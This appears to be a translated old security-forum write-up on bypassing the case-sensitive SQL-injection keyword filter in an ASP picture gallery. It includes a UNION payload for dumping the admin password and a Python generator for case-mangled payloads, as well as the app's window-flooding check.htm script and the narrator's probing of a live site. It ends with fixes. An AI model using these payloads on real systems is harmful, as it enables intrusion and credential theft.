Easily bypassing your line of defense: vulnerability warning (Heiba Security Net, 黑吧安全网)

ID MYHACK58:6220066092
Type myhack58
Reporter 佚名 (anonymous)
Modified 2006-01-05T00:00:00


The other day, while browsing a site, my hands got itchy for a moment and I appended " and 1=2" to the URL to see whether the system had a SQL injection vulnerability. Who knew the browser would pop up two dialog boxes and then open windows without end. I had to kill the process, which was annoying, since I use the TT browser and all my other windows died with it, sob. Really outrageous: if you don't want to be injected, there is no need to treat me like that. I wanted to see what this program was actually capable of. In the end I did not dare to try that system again and instead got a webshell from another place. After asking around, it turned out to be something called "Conan picture management system". Once you know the name things get easy: I downloaded a copy and looked at the source first. In view.asp there is this:

if instr(id,"'") or instr(id,"select") or instr(id,"in") or instr(id,"from") or instr(id,"len") or instr(id,"where") or instr(id,"or") or instr(id,"and") then
    Response.Write("<script language=javascript>alert('what do you want to do?');window.location.href='check.htm'</script>")
    Response.End
end if
' the damn bad characters get filtered here

Now look at the content of check.htm:

<script language=javascript>
alert("I call it! What do you want to do???");
for (i=1;i<=10000000000;i++) {
    window.open("")
}
</script>

Look at its evil intentions: pop up two dialog boxes, then open a window ten billion times. Cool, isn't it? Of course I could not let him bully me for nothing; I had to break his SQL injection defense. A careful look shows that his defense is simply useless: we only need to change the case of a few characters. His check uses the instr function; if it finds and, or, select or one of the other keywords, it jumps to check.htm. Now look at how instr is used: InStr([start, ]string1, string2[, compare]). There are two optional parameters, start and compare, and the problem lies precisely in compare. With compare = 0 it performs a binary comparison, with compare = 1 a text comparison, and the default is 0. In short, with compare 0 the comparison is case-sensitive, i.e. instr(" and 1=2", "And") equals 0. So it is simple: change one letter of each filtered keyword to uppercase, and his long filter statement is reduced to filtering only the single quote. That does not matter, since this injection does not need a quote anyway.

His table is named admin, the user field is admin and the password field is password. Guessing it by hand is slow, and it seems none of the usual tools can be used here (they send the keywords as-is and trip the filter), so knowing how to program comes in handy after all. Of course you can also use a UNION query to obtain the administrator password directly, which is much faster than guessing, or write a program, which is faster still.

[Image: attachments/200508/12_181119_1.jpg]

Copy the URL to access it. Eh, no, first you have to switch the case of the keywords; note in particular that password contains "or" and admin contains "in". Don't say I didn't warn you.

[Image: attachments/200508/12_181208_2.jpg]

Once again: Enjoy Hacking! And finally, if you want to defend against this, simply setting the compare parameter to 1 (vbTextCompare) is enough to close the case trick. A keyword blacklist stays fragile, though: since the id parameter here is numeric, the robust fix is to reject anything that is not an integer before it reaches the query, or to use parameterized queries.
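The filter from view.asp, the case-change bypass and the compare = 1 fix, modelled side by side in Python as an added example (this is not code from the Conan picture management system or from the author's own tool). VBScript's InStr is reimplemented for both compare modes; the keyword list is the one quoted from view.asp; the table and field names admin/admin/password come from the article; the two-column UNION payload and the strict integer check are my assumptions.

```python
"""Model of the view.asp keyword filter and of the case-change bypass.

Added example, not code from the Conan picture management system or the
author's tool. VBScript's InStr is reimplemented for both compare modes so
the bypass and the compare=1 fix can be checked side by side.
"""
import re

# Keyword list exactly as in the view.asp check quoted in the article.
BLACKLIST = ["'", "select", "in", "from", "len", "where", "or", "and"]


def instr(string1: str, string2: str, compare: int = 0) -> int:
    """VBScript InStr: 1-based position of string2 in string1, 0 if absent.

    compare 0 (vbBinaryCompare, the default) is case-sensitive;
    compare 1 (vbTextCompare) compares case-insensitively.
    """
    if compare == 1:
        string1, string2 = string1.lower(), string2.lower()
    return string1.find(string2) + 1  # find() returns -1 when absent -> 0


def is_blocked(id_param: str, compare: int = 0) -> bool:
    """The view.asp check: any blacklist hit redirects the visitor to check.htm.

    compare=0 reproduces the original (vulnerable) call; compare=1 is the
    author's proposed fix.
    """
    return any(instr(id_param, word, compare) != 0 for word in BLACKLIST)


def mangle_case(payload: str) -> str:
    """Uppercase the second letter of every lowercase blacklist keyword.

    Binary compare never matches an uppercase letter against a lowercase
    pattern, and uppercasing can only remove lowercase substrings, never
    create new ones, so one pass per keyword suffices. The quote gets no
    treatment: it has no case, which is why this only works for a numeric id.
    """
    out = payload
    for word in BLACKLIST:
        if not word.isalpha():
            continue
        pos = out.find(word)
        while pos != -1:
            i = pos + 1  # second character of this keyword occurrence
            out = out[:i] + out[i].upper() + out[i + 1:]
            pos = out.find(word)
    return out


def is_valid_id(id_param: str) -> bool:
    """Stricter alternative (my suggestion, not from the article): the id is
    numeric, so accept only an unsigned ASCII integer and skip the blacklist."""
    return re.fullmatch(r"[0-9]+", id_param) is not None


# Constructed payloads. Table admin with fields admin and password comes from
# the article; a two-column SELECT in view.asp is an assumption.
PROBE = "1 and 1=2"
DUMP = "1 union select admin,password from admin"


def run_demo() -> dict:
    """Per payload: blocked as typed, blocked after mangling under compare=0,
    blocked after mangling under compare=1, and the mangled form itself."""
    report = {}
    for payload in (PROBE, DUMP):
        mangled = mangle_case(payload)
        report[payload] = {
            "as_typed": is_blocked(payload),
            "mangled_binary": is_blocked(mangled, compare=0),
            "mangled_text": is_blocked(mangled, compare=1),
            "mangled": mangled,
        }
    return report


if __name__ == "__main__":
    for payload, r in run_demo().items():
        print(f"{payload!r} -> {r['mangled']!r}: blocked as typed={r['as_typed']}, "
              f"mangled compare=0 blocked={r['mangled_binary']}, "
              f"mangled compare=1 blocked={r['mangled_text']}")
    print("strict integer check:", is_valid_id("12"), is_valid_id(PROBE))
```

Running it shows the two states the article describes: the lowercase payloads are caught, the mangled ones ("1 aNd 1=2", "1 union sElect admiN,passwoRd fRom admiN") pass the compare = 0 filter, and the same mangled payloads are caught again once compare = 1 is used. The integer check rejects both forms without needing any keyword list.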